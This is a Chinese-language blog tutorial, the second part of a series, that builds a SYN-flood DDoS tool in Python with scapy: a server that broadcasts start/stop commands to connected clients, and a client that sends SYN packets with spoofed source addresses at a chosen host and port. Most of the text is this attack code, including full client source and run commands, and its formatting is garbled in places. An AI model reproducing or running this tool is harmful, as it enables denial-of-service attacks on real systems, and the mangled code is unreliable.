用Python-scapy实现SYNDdos攻击(2)

四在第一篇学习了基础知识,本篇实现Server和Client的编码实现

  1. Server端
    由于Server端能等待Client主动连接,所以在Server端发送命令,控制Client端发起SYN泛洪攻击。
    实现主函数的完整逻辑,在主函数中创建socket, 绑定所有网络地址和58868端口并开始监听,之后新开一个线程来等待客户端的连接,以免阻塞输入命令。
def main(): 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    s.bind(('0.0.0.0', 58868)) 
    s.listen(1024) 
    t = Thread(target=waitConnect,args=(s,)) 
    t.start()
    print('Wait at least a client connection!') 
    while not len(socketList):  #主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器
      pass 
    print('It has been a client connection!')
    
    while True: print('=' * 50) 
        print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "') 
        #等待输入命令 
        cmd_str = input('Please input cmd:') 
        if len(cmd_str): 
              if cmd_str[0] == '#': 
                sendCmd(cmd_str)  ##如果满足了,我们就把命令发送给所有客户端。

编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。

#等待连接
def waitConnect(s): 
    while True: 
          sock,addr = s.accept() 
    if sock not in socketList:  #新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中
          socketList.append(sock)
#发送命令
def sendCmd(cmd): 
      print('Send command......') 
      for sock in socketList: 
        sock.send(cmd.encode('utf-8'))
  1. Client端
    在Client端实现对主机的SYN泛洪攻击,并在脚本启动后主动连接Server端,等待Server端发送命令。
    在主函数中先创建ArgumentParser()对象,并将需要解析的命令参数添加好。
def main():
     p = argparse.ArgumentParser() 
     p.add_argument('-H', dest='host', type=str) 
     p.add_argument('-p', dest='port', type=int) 
     p.add_argument('-c', dest='cmd', type=str)```
    ``` 
 #测试我们连接到本地地址的58868端口吧!之后我们就可以等待服务器发送命令了。
    try:
       s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
       s.connect(('127.0.0.1',58868)) print('To connected server was success!') 
       print("=" * 40) 
       cmdHandle(s,p)
     ```

except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)

将接收命令和处理命令定义在了一个单独的函数中。在这里用到了一个全局变量,用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了,接收之后到的数据是byte型,需要对其进行解码,解码之后才是字符串。如果接收到的数据长度为0,就跳过后续的内容,重新接收数据。

处理命令

def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
continue

如果数据的长度不为0,就判断是否具有命令基本格式的特征(#),满足基本条件就需要用我们的ArgumentParser对象来解析命令了

if data[0] == '#':
try: #解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host m_port = options.port
m_cmd = options.cmd

命令参数解析出来后,我么就要判断到底是start命令还是stop命令了,如果是start命令,我们首先判断当前是否有进程在运行,如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击,我们就先结束这个进程,并清空屏幕。然后我们就直接启动一个进程,发起SYN泛洪攻击

DDoS启动命令

if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
#结束进程
curProcess.terminate() curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start() curProcess = p

DDoS停止命令

  elif m_cmd.lower() =='stop': 
        if curProcess.is_alive(): 
            curProcess.terminate()
           os.system('clear') 
except: 
      print('Failed to perform the command!')
###五、测试
 - 运行Server脚本
``` sudo python3 ddosSrv.py ```
 - 运行Client脚本
```sudo python3 ddosCli.py ```

 - 输入一个命令测试一下
```#-H x.x.x.x -p 80 -c start  ```

#####Client端源代码:

!/usr/bin/python3

-- coding: utf-8 --

import sys
import socket
import random
import argparse
from multiprocessing import Process
from scapy.all import *
import os
isWorking = False
curProcess = None

SYN泛洪攻击

def synFlood(tgt,dPort):
print('='100)
print('The syn flood is running!')
print('='
100)
srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
for sPort in range(1024,65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")
packet = ipLayer / tcpLayer
send(packet)

命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c '

处理命令

def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
return
if data[0] == '#':
try:
#解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host
m_port = options.port
m_cmd = options.cmd
#DDoS启动命令
if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
curProcess.terminate()
curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start()
curProcess = p
#DDoS停止命令
elif m_cmd.lower() =='stop':
if curProcess.is_alive():
curProcess.terminate()
os.system('clear')
except:
print('Failed to perform the command!')

def main():
#添加需要解析的命令
p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str)
p.add_argument('-p', dest='port', type=int)
p.add_argument('-c', dest='cmd', type=str)
print("*" * 40)
try:
#创建socket对象
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#连接到服务器端
s.connect(('127.0.0.1',58868))
print('To connected server was success!')
print("=" * 40)
#处理命令
cmdHandle(s,p)
except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)

if name == 'main':
main()

结束

你可能感兴趣的:(用Python-scapy实现SYNDdos攻击(2))